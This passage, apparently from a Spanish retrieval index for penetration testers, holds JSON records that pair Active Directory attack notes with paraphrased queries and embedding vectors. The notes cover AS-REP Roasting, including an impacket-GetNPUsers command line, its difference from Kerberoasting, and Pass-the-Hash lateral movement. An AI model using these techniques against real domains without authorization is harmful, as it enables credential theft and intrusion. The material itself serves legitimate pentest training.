0.03562, 0.03043, 0.01001, 0.02666, 0.06318, 0.11171, -0.098, 0.03671, 0.06588, 0.01508, 0.07399, -0.05374, 0.00799, 0.05407, 0.01653, -0.0673, -0.0089, -0.01019, -0.03372, -0.01588, -0.07486, -0.04915, 0.00239, -0.04762, -0.08235, -0.0296, 0.0467, -0.00297, 0.01949, 0.03593, 0.0292, -0.00618, -0.04283, -0.08094, 0.00867, -0.04477, -0.00577, -0.11643, -0.08401, 0.09162, 0.07828, -0.00241, -0.0435, -0.02887, -0.01223, 0.0528, -0.07332, 0.00126, -0.01149, -0.11721, 0.07527, -0.06404, -0.02014, -0.00931, -0.07808, -0.00469, -0.11617, 0.08932, 0.00964, 0.04271, -0.09715, -0.03101, -0.02939, -0.00233, -0.02114, -0.04848, -0.09055, 0.04654, -0.00035, -0.00285, 0.06084, 0.00643, -0.08427, 0.05417, 0.01394, 0.08243, 0.07203, -0.0438, 0.04876, -0.06325, 0.06439, -0.00604, -0.01165, -0.01767, 0.01841, -0.02674, -0.01993, 0.01542, -0.03265, -0.00101, -0.01856, 0.00386, -0.04635, 0.0347, -0.01947, 0.06021, -0.04363, -0.01475, 0.02203, -0.00977, 0.04209, -0.02828, -0.06191, -0.00819, -0.05185, 0.04199, 0.05463, -0.00959, -0.02649, -0.05568, 0.01542, 0.03084, 0.04199, -0.04328, 0.04957, -0.02082, 0.02279, -0.03235, -0.03988, -0.00623, -0.01787, -0.01971, -0.00879, -0.07455, -0.04464, 0.04414, 0.01399, 0.02447, 0.05099, 0.07906, -0.04344, -0.01568, 0.00876, -0.00563, -0.0015, -0.02895, 0.03904, 0.00393, 0.00043, -0.03309, 0.0093, 0.06055, 0.05064, 0.07525, -0.03808, 0.05182, 0.0134, -0.03092, -0.06166, -0.03927, -0.06359, -0.04354, -0.04971, -0.00489, -0.00403, 0.00908, -0.01465, 0.03083, -0.03696, 0.01574]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "indexar": "con que puedo obtener los usuarios de un dominio si tengo las credenciales?", "v": [-0.17849, 0.08854, -0.11047, -0.04336, 0.00245, 0.01441, 0.02987, 0.0206, -0.147, -0.08418, -0.03952, -0.02728, -0.00491, -0.22269, 0.00404, -0.02742, 0.16561, 0.0518, 0.07356, -0.06152, 0.0303, -0.15136, -0.10601, -0.0101, 0.05741, -0.02345, -0.01954, -0.10087, 0.06504, 0.14906, 0.08747, -0.09967, -0.02853, 0.03085, -0.01367, -0.0256, -0.07172, 0.11426, 0.08433, 0.18164, 0.0935, 0.00223, -0.08062, -0.00655, -0.01021, 0.05002, -0.09643, -0.04821, -0.03719, -0.13187, -0.0299, -0.1125, -0.12466, -0.1079, -0.04397, -0.03685, 0.14503, -0.09094, 0.05068, -0.11988, -0.06553, -0.0423, 0.07188, 0.13892, -0.03637, -0.10206, 0.02667, 0.04078, -0.04432, 0.0775, 0.00223, -0.01533, 0.01941, -0.03607, 0.10099, -0.06567, 0.04735, -0.07259, 0.07188, -0.02903, 0.05766, -0.0067, -0.01035, -0.10236, -0.09594, -0.1065, -0.09988, -0.12155, 0.05474, 0.02044, 0.0865, 0.09318, -0.04319, -0.05791, -0.0818, 0.00436, 0.00848, -0.06287, -0.10301, -0.05491, 0.03987, 0.13822, -0.03382, 0.11607, 0.07867, 0.05079, 0.05406, -0.07993, 0.00935, -0.0073, 0.00382, -0.00244, -0.05821, -0.02776, -0.04315, 0.10176, -0.07933, -0.05114, 0.03345, -0.01307, -0.00034, -0.09205, 0.08818, -0.04626, 0.05622, 0.02431, -0.02593, -0.03106, -0.08818, -0.13588, -0.05128, -0.00903, 0.01531, -0.02762, 0.0053, 0.00702, -0.00808, -0.00449, -0.05815, 0.0621, 0.00184, 0.00443, -0.11655, -0.07019, 0.01828, -0.07097, -0.03115, -0.13611, -0.01555, -0.11703, -0.07397, 0.03959, -0.03297, 0.01818, -0.00418, 0.07226, -0.00827, -0.00274, 0.02321, -0.00934, -0.0463, -0.00107, 0.00576, 0.03358, -0.02078, -0.03323, 0.01973, -0.01369, -0.00048, 0.04906, -0.05698, 0.02723, -0.04214, -0.03082, 0.06565, 0.01373, -0.00925, -0.00277, -0.05398, -0.01885, 0.01568, -0.05764, -0.02235, 0.05197, -0.05144, 0.0457, -0.0102, 0.03543, -0.03115, 0.01905, 0.06054, 0.0394, 0.01499, 0.04802, 0.04825, -0.02631, 0.02004, 0.04159, -0.03111, -0.02517, -0.0361, -0.01046, 0.01909, 0.01405, -0.00311, -0.02352, 0.01844, -0.00432, 0.05074, -0.00856, 0.01742, -0.0299, 0.02572, -0.09321, -0.0312, 0.01633, 0.01283, 0.02511, -0.03197, -0.11441, -0.04563, 0.05126, -0.018, 0.01081, 0.02027, 0.00313, -0.04625, -0.02265, 0.01576, 0.06482, 0.01233, -0.02963, -0.03538, 0.01599, 0.03893, 0.00369, 0.03376, 0.02439, -0.01128, 0.01816, -0.08382, 0.02101, 0.04221, -0.0199, -0.05168, -0.0239, -0.05818, 0.00214, -0.05792, -0.00176, 0.01321, 0.01136, 0.04822, 0.00186, -0.00991, 0.04798]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "indexar": "cual es una herramienta para listar usuarios en red con usuario y contraseΓ±a?", "v": [-0.00081, 0.03238, -0.09004, -0.22683, -0.00804, -0.13261, -0.13568, -0.08583, -0.00911, -0.09124, -0.03912, -0.15147, -0.00718, -0.08257, 0.0553, -0.03441, 0.07564, 0.0396, 0.06381, 0.00107, 0.00875, 0.01315, -0.09585, 0.02108, -0.07879, 0.01591, 0.07293, -0.10496, -0.08727, 0.0467, 0.01026, -0.03188, -0.02914, -0.03644, -0.06022, 0.10613, 0.05911, 0.0568, 0.00356, 0.1787, 0.04238, 0.12841, -0.11233, 0.08704, -0.0321, 0.07723, -0.03292, -0.00352, 0.08648, 0.07268, -0.05503, -0.14241, -0.15502, -0.06345, -0.00176, -0.17108, 0.2223, -0.11179, 0.01028, -0.04418, -0.1164, 0.01728, -0.01544, 0.10593, -0.12629, -0.0729, 0.04314, -0.02087, -0.08534, 0.14114, 0.06715, 0.03053, -0.08793, -0.01868, 0.05202, 0.06006, 0.04104, -0.02047, 0.0561, 0.04821, -0.03226, -0.03192, -0.02021, -0.02733, -0.09558, -0.09806, 0.10497, -0.04714, 0.05558, -0.07217, 0.07748, -0.01854, 0.03194, 0.00867, 0.05217, -0.07253, 0.06877, -0.05786, -0.07179, -0.07837, 0.07275, 0.06391, -0.05462, 0.10575, -0.01077, -0.03426, -0.04275, -0.02403, -0.0273, -0.06598, 0.08868, -0.0479, 0.00772, -0.02445, 0.01783, 0.01864, -0.05558, -0.12525, -0.01371, -0.06443, -0.00988, 0.01304, -0.04664, -0.08334, 0.09017, 0.03287, -0.01404, 0.0727, -0.07671, -0.1149, -0.02717, -0.02984, -0.0517, 0.01886, -0.06175, 0.01778, -0.04876, -0.15782, -0.0655, 0.01274, 0.00611, 0.0163, -0.05198, -0.09888, 0.05726, 0.02745, 0.05419, -0.04658, -0.09187, 0.04571, -0.02158, -0.03343, -0.04377, -0.00373, -0.02181, 0.06132, -0.04872, -0.01399, -0.06839, 0.03794, -0.03702, -0.07629, 0.03766, -0.00837, -0.06738, -0.08321, 0.05016, 0.04864, 0.06711, -0.00228, 0.07124, 0.04969, 0.01141, -0.02855, -0.00206, -0.08623, -0.00935, -0.02629, -0.03268, -0.10035, -0.00382, -0.0541, -0.01799, -0.03222, 0.00216, -0.11591, 0.03096, -0.01023, 0.00116, 0.01501, -0.03743, 0.03209, 0.01794, 0.00143, 0.05996, -0.00474, -0.00146, -0.03227, -0.01591, -0.07483, -0.00423, 0.00612, -0.01126, -0.01452, 0.02486, 0.01067, -0.02037, -0.02832, 0.01749, -0.00339, 0.05584, 0.00472, 0.02883, -0.02995, -0.05535, -0.07675, 0.01793, 0.03899, -0.01526, -0.05178, 0.04413, 0.03585, 0.02028, 0.03292, -0.01716, 0.03287, -0.02569, -0.01633, -0.02079, -0.00311, 0.00385, -0.03132, -0.0192, -0.01371, 0.05507, -0.0318, 0.00778, -0.00753, -0.04533, -0.02287, -0.05194, 0.06054, 0.00597, -0.05828, -0.0318, 0.00219, -0.0432, 0.00836, -0.03803, -0.07432, -0.04836, 0.00577, 0.06127, -0.05214, 0.02394, -0.01537]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# con credenciales (enumera y pide a la vez):\nimpacket-GetNPUsers dominio/usuario:password -request -dc-ip IP\n```", "indexar": "que programa me sirve para sacar la lista de usuarios de un dominio?", "v": [-0.02164, 0.05569, -0.19087, -0.14336, -0.07275, -0.20834, 0.04746, -0.13018, -0.12904, 0.0381, -0.01192, -0.18251, 0.06988, -0.26682, -0.04936, -0.01926, 0.13276, -0.03399, 0.06871, 0.03065, 0.04886, 0.04977, 0.01405, -0.05379, -0.05928, -0.01338, 0.01593, -0.18517, -0.06139, 0.1531, 0.06998, -0.05443, -0.02556, -0.14549, 0.05593, -0.05591, 0.11093, -0.00028, 0.07451, 0.11613, 0.05618, 0.03221, -0.12642, -0.02382, -0.05996, 0.05687, -0.01302, -0.01064, 0.06039, -0.0699, 0.00106, -0.04965, -0.03463, 0.06279, -0.00776, -0.13051, -0.01848, -0.14074, -0.04642, -0.0484, -0.09959, -0.0506, 0.01622, 0.04235, -0.02663, -0.07185, 0.07101, 0.00503, -0.02078, 0.02771, 0.01067, 0.04389, 0.10814, -0.05813, 0.01188, -0.00872, 0.05598, -0.04399, 0.02765, -0.05749, 0.0146, -0.02061, -0.03122, 0.00324, -0.09863, -0.08868, 0.00824, -0.07124, 0.02431, -0.00713, 0.0567, 0.11031, -0.07439, 0.01261, 0.04094, -0.05015, 0.1455, 0.03783, 0.034, -0.02461, 0.12463, 0.05134, -0.08331, 0.08782, 0.04043, 0.11281, 0.07982, -0.10577, -0.11057, 0.02183, -0.00776, -0.08688, -0.06683, -0.03214, -0.08091, 0.05596, -0.07917, -0.02153, -0.00719, -0.05532, -0.10314, -0.0258, 0.03238, -0.04568, 0.105, 0.02583, -0.02089, 0.06756, -0.05071, -0.05818, -0.00887, 0.04579, -0.02205, -0.03385, -0.08413, -0.05845, 0.03368, 0.00782, -0.01897, -0.00016, 0.02163, 0.08326, -0.09637, -0.01266, 0.00715, -0.0813, 0.08659, -0.09499, -0.02309, -0.02969, -0.06643, -0.00565, -0.02765, 0.06372, -0.03448, 0.01371, -0.01324, -0.03281, -0.02298, 0.00865, -0.06556, -0.01937, 0.00902, -0.01998, 0.03639, -0.00426, 0.02946, -0.00436, 0.10874, 0.07311, 0.00352, 0.07539, 0.03155, -0.04659, 0.00464, -0.0207, 0.00872, -0.03789, -0.01261, 0.02106, -0.09992, -0.03754, 0.04096, 0.05494, -0.06509, 0.01021, -0.01296, -0.0394, -0.00581, 0.04301, -0.00505, 0.05866, -0.04817, 0.02182, 0.0269, -0.0332, 0.02378, 0.01814, 0.02561, -0.07666, -0.04961, -0.01385, 0.01786, 0.00777, 0.0159, 0.0661, 0.00157, -0.0193, 0.08073, 0.03803, 0.00382, -0.03472, 0.03493, -0.01232, -0.02935, -0.01561, 0.01908, 0.02042, 0.0198, -0.02714, -0.04322, 0.0279, -0.00236, 0.02438, 0.00802, 0.01504, 0.02403, -0.03061, 0.02657, 0.0188, -0.03144, -0.02258, -0.01893, -0.06025, 0.02071, -0.03536, -0.00063, -0.01504, -0.01967, -0.04759, -0.06152, 0.08046, 0.01114, -0.06459, -0.07704, -0.03497, -0.04582, 0.00231, -0.02425, -0.01687, -0.04021, 0.01762, 0.05857, -0.02128, 0.02594, 0.03276]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth β†’ **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) β†’ necesitas una credencial vΓ‘lida.\n\nRelacionado: Cracking de contraseΓ±as Β· Kerberoasting Β· Kerberos Β· Impacket Β· OSCP MOC", "indexar": "que programa sirve para robar contraseΓ±as sin pedirlas?", "v": [0.13828, -0.07516, -0.12008, -0.20336, 0.00176, -0.13521, 0.11085, -0.0484, -0.03783, -0.03389, 0.02364, -0.12865, 0.14116, -0.16635, 0.05767, 0.02186, -0.03091, 0.10359, 0.09625, 0.12927, 0.03763, 0.03375, 0.01073, -0.05189, -0.02127, -0.00751, 0.03491, -0.05063, -0.09615, 0.07054, -0.03949, -0.07851, 0.08695, -0.03263, -0.06121, 0.10999, 0.05847, 0.02438, -0.04475, 0.08304, 0.14281, 0.08858, -0.12247, 0.00024, 0.03153, -0.03669, 0.03591, 0.02672, 0.10454, 0.06941, -0.03425, -0.08745, -0.02, -0.09331, -0.00429, -0.08585, 0.03425, -0.0253, -0.03079, -0.03608, -0.06903, 0.01457, 0.02068, 0.04643, 0.04287, -0.10121, 0.10191, 0.0408, 0.00127, 0.02373, -0.0707, 0.04977, -0.08225, 0.07237, 0.04828, -0.04271, -0.03077, -0.05787, 0.03697, 0.07556, -0.08009, 0.0433, -0.00903, 0.07618, -0.05561, 0.03037, 0.13491, 0.01337, 0.03787, -0.02754, 0.07152, 0.1338, -0.00957, 0.0489, 0.03827, -0.08893, 0.11361, 0.06315, -0.09647, 0.05935, 0.02293, -0.10621, -0.1115, 0.13438, -0.12186, 0.06037, 0.00423, -5e-05, 0.00086, -0.06122, -0.03609, -0.03357, -0.01666, -0.00405, -0.03176, 0.01137, -0.03118, -0.06662, 0.00912, -0.0165, -0.01512, -0.08186, -0.00567, 0.04455, 0.09256, 0.05584, 0.05886, 0.09206, -0.07781, -0.05337, 0.057, 0.01835, 0.00627, 0.02977, -0.01945, -0.04528, 0.01591, -0.12013, -0.10751, -0.00368, -0.02991, 0.08402, 0.02052, 0.05997, 0.02847, 0.05962, 0.08269, -0.01238, -0.00462, -0.0382, -0.03672, -0.0047, -0.03977, 0.05207, -0.0366, 0.04016, -0.00793, -0.11629, -0.11449, 0.08337, 0.00022, -0.01845, -0.0602, -0.03474, -0.06697, -0.06993, 0.02726, 0.0834, 0.0771, 0.05286, 0.05621, 0.04123, 0.03766, -0.07419, -0.05187, 0.02299, 0.04053, -0.06895, 0.02144, -0.06019, -0.12166, 0.04952, 0.04966, 0.03904, -0.02771, -0.0366, 0.06381, 0.03404, -0.02701, -0.05167, 0.04982, -0.02701, -0.05845, 0.07792, 0.01058, -0.01929, -0.03576, 0.0138, 0.03543, -0.05435, -0.02899, 0.02395, -0.06318, -0.04768, 0.10389, 0.06104, -0.01568, -0.05707, 0.00242, 0.06319, 0.01827, 0.01929, -0.00762, -0.0458, -0.02488, -0.05021, -0.0264, 0.10979, -0.03475, -0.00302, 0.00192, 0.00824, 0.03023, 0.07455, 0.01026, -0.02326, -0.05296, 0.01476, 0.00733, -0.00704, -0.0012, -0.00462, -0.07067, -0.01776, 0.04491, -0.04162, -0.06637, -0.04604, 0.04995, -0.09584, -0.07671, 0.07611, -0.02498, -0.09768, -0.04835, 0.02537, -0.03068, 0.01861, 0.06152, 0.0274, -0.01686, 0.05472, -0.02892, -0.01297, 0.00399, -0.00589]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth β†’ **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) β†’ necesitas una credencial vΓ‘lida.\n\nRelacionado: Cracking de contraseΓ±as Β· Kerberoasting Β· Kerberos Β· Impacket Β· OSCP MOC", "indexar": "con que puedo hacer cracking de hashes de cuentas de servicio?", "v": [0.23831, 0.09038, -0.13025, -0.00534, 0.06676, -0.14989, -0.02097, 0.07174, -0.00891, 0.06023, -0.19622, -0.03611, -0.06566, -0.05825, 0.05452, 0.03253, -0.0189, 0.07443, 0.00314, 0.0487, 0.01954, -0.05919, -0.11237, 0.05791, -0.06896, -0.0887, -0.0087, 0.07848, -0.26353, 0.04075, -0.01723, -0.05369, -0.07543, 0.07633, 0.00707, 0.04719, -0.03826, 0.08145, 0.13688, 0.05834, -0.00844, 0.03816, -0.0593, 0.03433, 0.03583, -0.08163, -0.03442, 0.06482, 0.02925, 0.04208, 0.02407, -0.13515, -0.23362, 0.0289, -0.1246, -0.04872, 0.00242, -0.02042, -0.19557, -0.10296, -0.02838, 0.01787, 0.04671, 0.0305, -0.02907, -0.03492, 0.02529, 0.02912, 0.06112, 0.08402, -0.07949, 0.04746, -0.0599, -0.02398, -0.03194, -0.01306, 0.03937, -0.13292, -0.06054, 0.05978, -0.00094, -0.05671, 0.03657, 0.02288, -0.10016, 0.01881, -0.0755, -0.06202, 0.11302, 0.02756, 0.0156, 0.08002, -0.0688, 0.10995, -0.07219, 0.09607, 0.11624, 0.01087, -0.09268, -0.01946, 0.0143, 0.02067, -0.11959, 0.08272, -0.05774, 0.03179, 0.08758, -0.06024, 0.08779, -0.06604, 0.05848, -0.04224, -0.10724, -0.05418, -0.10191, -0.01323, -0.05581, 0.01606, 0.01849, 0.07522, -0.05374, -0.04504, 0.07604, 0.08673, 0.03409, -0.05484, -0.05575, 0.08051, 6e-05, -0.00314, 0.02575, -0.00148, -0.05765, 0.01009, 0.06487, -0.00463, 0.02784, -0.06759, 0.02884, -0.0429, 0.00346, 0.06229, 0.01772, -0.03204, 0.0716, 0.00262, -0.01593, -0.02808, -0.09888, 0.02588, 0.09141, -0.02334, -0.06064, 0.06054, -0.0752, -0.02945, 0.04682, -0.03623, -0.03742, 0.06406, -0.06742, 0.00412, 0.02392, 0.07436, -0.01566, -0.00019, 0.03494, 0.05107, 0.07254, -0.04952, -0.08641, 0.06441, 0.01928, -0.03448, 0.0554, -0.05106, -0.0768, -0.0465, -0.028, -0.04103, -0.05286, -0.07232, 0.02073, -0.03632, -0.02982, 0.00442, 0.00967, -0.01384, 0.02337, -0.02608, -0.00266, -0.00529, -0.07782, 0.05966, 0.02168, -0.02944, 0.04989, 0.03716, -0.0116, -0.09795, -0.04298, 0.05841, -0.01068, -0.00729, -0.0133, 0.0617, -0.02743, 0.03183, -0.03525, 0.03083, 0.06893, -0.01723, 0.05538, -0.03658, -0.05127, 0.04017, 0.00938, -0.02753, -0.01736, 0.06378, -0.00179, 0.01222, 0.04278, 0.0332, 0.01235, -0.01256, 0.0165, -0.03321, 0.02069, 0.05447, 0.0024, 0.05184, -0.009, -0.0072, -0.0044, 0.00051, 0.02944, -0.01747, -0.029, -0.01177, -0.00304, 0.04376, 0.01222, 0.02187, -0.02175, -0.01239, -0.04529, 0.04901, -0.04296, -0.06142, 0.02228, 0.04445, 0.02091, 0.02737, 0.02946, -0.02214]} -{"tipo": "pregunta", "herramienta": "AS-REP Roasting", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/AS-REP Roasting.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Diferencia con Kerberoasting\n- **AS-REP** = usuarios SIN pre-auth β†’ **no necesitas password** para pedir el hash.\n- **Kerberoasting** = cuentas de servicio (SPN) β†’ necesitas una credencial vΓ‘lida.\n\nRelacionado: Cracking de contraseΓ±as Β· Kerberoasting Β· Kerberos Β· Impacket Β· OSCP MOC", "indexar": "cual es la diferencia entre AS-REP y Kerberoasting en herramientas", "v": [-0.19042, -0.14786, 0.05383, -0.04251, 0.08787, -0.09849, -0.00125, 0.14238, -0.10026, -0.05457, -0.21012, -0.05882, -0.08945, -0.14486, 0.33964, 0.02883, -0.13099, 0.01589, 0.05616, 0.10402, 0.09323, 0.02295, -0.07282, 0.072, -0.01587, 0.06009, 0.08812, -0.01989, -0.08666, 0.1217, -0.00442, 0.07737, 0.01066, -0.01926, -0.08761, 0.0116, -0.03007, 0.07999, 0.07674, 0.09944, -0.02956, 0.05092, -0.03525, 0.06434, 0.026, -0.04207, -0.08792, 0.09087, -0.05674, 0.06851, -0.05322, 0.03634, -0.07762, -0.08426, 0.03586, -0.0867, 0.19099, -0.03507, -0.02714, -0.04001, -0.08125, -0.07584, -0.06989, -0.02048, 0.0258, -0.19571, -0.07862, -0.18805, -0.03152, 0.02481, -0.0597, 0.05231, 0.04457, -0.03959, -0.00073, 0.03218, 0.03672, 0.07755, -0.02152, -0.01828, -0.00452, -0.00683, -0.06215, 0.08733, 0.05911, -0.10082, 0.09803, -0.02516, 0.00452, -0.12018, -0.04037, 0.07197, -0.03446, 0.05675, 0.04051, -0.0081, -0.07305, 0.05559, -0.01333, -0.04801, 0.0478, 0.00508, -0.05443, -0.01071, -0.0618, 0.05275, -0.01814, 0.06921, 0.00882, -0.0285, 0.03346, 0.12593, 0.00155, 0.01772, -0.02546, 0.04485, 0.00264, -0.04404, 0.06958, -0.04242, -0.01043, 0.08005, -0.08493, 0.00171, 0.0398, 0.00838, 0.09621, 0.06084, -0.00341, 0.02242, 0.03843, 0.02823, -0.04535, 0.01583, 0.07158, -0.04921, -0.06745, -0.08193, -0.01417, -0.05104, -0.00592, 0.03175, -0.04723, -0.04448, -0.032, -0.01944, 0.01981, -0.01745, -0.05247, 0.01578, -0.05413, -0.02517, -0.0084, 0.09143, -0.04618, -0.06567, -0.09549, 0.00186, -0.06907, 0.07231, -0.02184, -0.07112, 0.06565, -0.06055, 0.0756, 0.01868, -0.01308, 0.04611, 0.07759, -0.00382, 0.00782, 0.03332, 0.01837, 0.06946, -0.01024, -0.00793, 0.00189, -0.02078, -0.03392, 0.00157, 0.01464, -0.03403, 0.00281, 0.02793, 0.02682, -0.02848, -0.06211, -0.01782, -0.06005, 0.02361, 0.00761, -0.02452, -0.01069, -0.03646, 0.0258, -0.00465, 0.04341, -0.02552, 0.02479, 0.06797, -0.06571, -0.01142, -0.01028, -0.05431, 0.02839, -0.00154, -0.01899, -0.05269, 0.00543, 0.02478, 0.02278, -0.02832, -0.01137, -0.05242, -0.03465, -0.0178, 0.02681, -0.00318, -0.03057, 0.03867, 0.05934, 0.00371, 0.06291, -0.02296, -0.04193, 0.06444, -0.01766, 0.00618, -0.05663, -0.00309, 0.02948, 0.01566, -0.02427, -0.03263, -0.01544, 0.03754, -0.02117, -0.00104, 0.03734, 0.0278, 0.026, -0.00953, 0.00732, 0.02309, -0.00935, 0.0147, -0.04961, -0.10643, -0.04218, 0.00541, -0.04893, 0.00916, -0.02084, -0.01902, -0.02228, -0.04824]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseΓ±a en claro. La base del Movimiento lateral en AD.", "indexar": "que herramienta sirve para autentica con un hash NTLM sin la contraseΓ±a", "v": [0.00961, -0.03623, -0.15191, -0.166, 0.06228, -0.11491, -0.20487, 0.01178, -0.01626, 0.12346, -0.03251, 0.00578, 0.07989, 0.00671, 0.00846, 0.10754, 0.04537, -0.13271, 0.02667, 0.10623, -0.03773, -0.01901, -0.10644, -0.08476, -0.03302, -0.09746, 0.06379, 0.04466, -0.18236, 0.03172, -0.02608, -0.03445, -0.01117, 0.05277, 0.01158, 0.08096, 0.00546, 0.07173, 0.04482, 0.17168, 0.11339, 0.17934, -0.04924, 0.18371, 0.01995, 0.02803, -0.0101, 0.01519, 0.10463, -0.0019, -0.10029, -0.09062, -0.17455, -0.08468, -0.05771, -0.12899, 0.17662, -0.01626, 0.00941, -0.0754, -0.1739, -0.01275, -0.00129, -0.06209, -0.10995, -0.07541, 0.07423, -0.04521, -0.04607, 0.05639, -0.06117, 0.02491, 0.01212, -0.04713, -0.05739, -0.01248, 0.01098, 0.01651, 0.05792, 0.10394, 0.05637, -0.07247, 0.00451, -0.04779, -0.12102, -0.02982, 0.08481, -0.03156, 0.09336, -0.0453, 0.00098, 0.04292, -0.01524, 0.00144, 0.06158, -0.04866, 0.03331, -0.07367, -0.00881, -0.05539, 0.12903, -0.07868, -0.03204, 0.12562, -0.0386, -0.01335, -0.00287, 0.006, -0.02878, 0.02306, 0.10005, -0.02486, -0.06958, 0.0011, 0.00962, 0.03041, -0.03638, -0.0825, -0.02213, -0.02939, -0.01797, -0.04664, -0.0089, 0.02456, 0.02372, 0.03463, -0.0515, 0.09487, -0.0333, -0.09286, 0.03264, -0.05735, -0.06499, 0.07193, 0.00854, -0.0229, -0.01379, -0.16699, -0.06004, -0.03984, 0.06486, 0.04004, 0.00063, -0.08583, 0.04827, 0.03789, 0.0079, -0.05026, -0.05615, -0.00281, 0.04172, -0.03273, 0.01725, 0.03655, -0.06151, 0.02816, -0.04799, -0.01131, -0.11515, 0.09678, -0.03961, -0.0469, 0.0019, 0.04583, -0.06802, -0.04207, 0.03797, 0.01988, 0.0699, 0.03643, 0.0457, 0.04475, 0.07332, -0.03382, 0.00217, -0.04765, -0.00094, -0.02652, -0.01769, -0.12792, -5e-05, -0.05359, 0.00303, -0.04063, 0.03004, -0.05626, 0.04332, -0.02046, -0.03649, 0.00583, 0.01024, 0.02128, -0.03909, 0.01913, 0.01722, 0.00719, -0.01994, -0.07093, 0.06558, -0.02051, -0.01435, 0.00158, -0.00633, -0.04799, 0.07058, 0.06867, -0.08054, -0.03528, -0.02847, 0.0108, 0.02749, -0.00267, 0.015, -0.03156, -0.03503, -0.05215, 0.0039, 0.04298, -0.04536, 0.00725, 0.02105, 0.01853, 0.04026, 0.04367, -0.00658, -0.02923, -0.00953, 0.02332, 0.01254, -0.0307, 0.00951, 0.01037, -0.04029, 0.03746, 0.07043, -0.03862, -0.01433, -0.02257, -0.04723, -0.0516, -0.02999, 0.01555, 0.00056, -0.0652, -0.03574, -0.00855, -0.02789, -0.0096, -0.00111, -0.02035, -0.0551, -0.02442, 0.05654, 0.01067, 0.00458, -0.01792]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pass-the-Hash\n\n> Te autenticas con el **hash NTLM** sin conocer la contraseΓ±a en claro. La base del Movimiento lateral en AD.", "indexar": "cual es una tecnica para hacer movimiento lateral en Active Directory usando el hash", "v": [-0.02217, 0.0337, -0.1283, -0.18334, -0.12143, -0.07364, -0.14462, 0.06218, -0.04151, 0.10211, -0.03995, -0.08243, -0.10644, 0.05562, 0.10128, -0.01914, 0.14739, -0.08454, -0.04502, -0.08236, -0.11347, 0.05306, -0.12594, 0.00444, 0.1169, -0.02883, -0.02135, -0.02741, -0.1775, -0.09443, -0.0033, 0.05461, 0.07764, -0.0005, 0.01243, -0.03071, -0.01395, 0.00959, 0.09675, 0.08848, -0.2148, 0.02115, -0.21806, 0.03488, 0.05573, 0.06592, 0.0224, -0.08665, -0.04866, 0.04501, 0.05489, 0.08955, -0.09653, -0.06844, 0.02424, -0.10487, 0.09243, -0.06088, -0.08965, -0.15262, 0.03632, -0.01845, -0.01672, -0.01194, -0.06006, -0.17232, 0.07821, -0.10994, -0.08831, -0.01309, 0.04407, 0.09237, -0.01476, 0.14555, -0.01515, 0.12624, 0.05089, -0.03664, -0.04824, 0.03425, -0.00181, 0.03445, 0.00192, 0.02214, -0.10578, -0.15072, 0.03481, -0.0898, 0.05521, 0.00313, 0.0873, 0.06041, -0.09482, 0.01262, 0.01516, 0.0876, -0.04735, 0.04899, -0.00641, -0.0219, 0.06247, -0.03699, -0.10904, 0.03628, 0.05421, -0.02836, 0.05437, 0.02779, -0.03508, 0.06689, 0.0256, -0.01245, -0.04948, -0.01088, 0.04116, 0.05863, -0.11348, -0.07674, -0.06908, 0.07294, -0.00017, -0.04325, -0.0001, -0.03855, 0.03062, -0.03927, -0.04282, 0.03649, -0.05964, 0.03528, 0.09845, 0.01915, -0.04416, -0.10168, -0.03958, 0.01644, 0.10469, 0.05442, 0.04199, -0.07527, 0.02055, 0.02049, -0.0161, -0.00158, 0.01985, 0.02731, 0.09152, 0.04863, -0.06501, 0.03793, -0.00925, -0.00015, 0.02933, 0.00971, 0.00506, 0.03115, -0.04297, -0.05079, -0.10908, 0.02921, 4e-05, 0.08003, -0.04807, -0.04778, -0.0387, -0.03914, -0.0692, 0.00201, 0.02439, 0.04397, 0.00398, -0.00038, -0.00379, -0.03183, 0.05707, 0.00036, -0.03293, 0.02636, 0.0469, -0.03005, 0.00896, 0.0119, 0.01964, -0.01261, 0.05827, 0.00114, 0.06188, 0.00231, 0.05117, 0.04313, -0.02601, 0.0502, -0.04589, -0.02232, -0.04588, -0.05529, 0.01153, -0.04334, 0.05086, -0.0293, -0.00401, 0.0214, 0.06422, -0.02419, 0.0483, 0.02161, -0.0463, 0.02726, 0.03418, -0.02483, -0.02993, -0.01073, 0.10795, 0.08032, -0.08802, 0.0423, -0.03264, -0.00193, -0.05627, 0.01297, 0.00724, -0.00095, 0.02053, -0.00789, 0.00874, 0.02176, 0.03631, 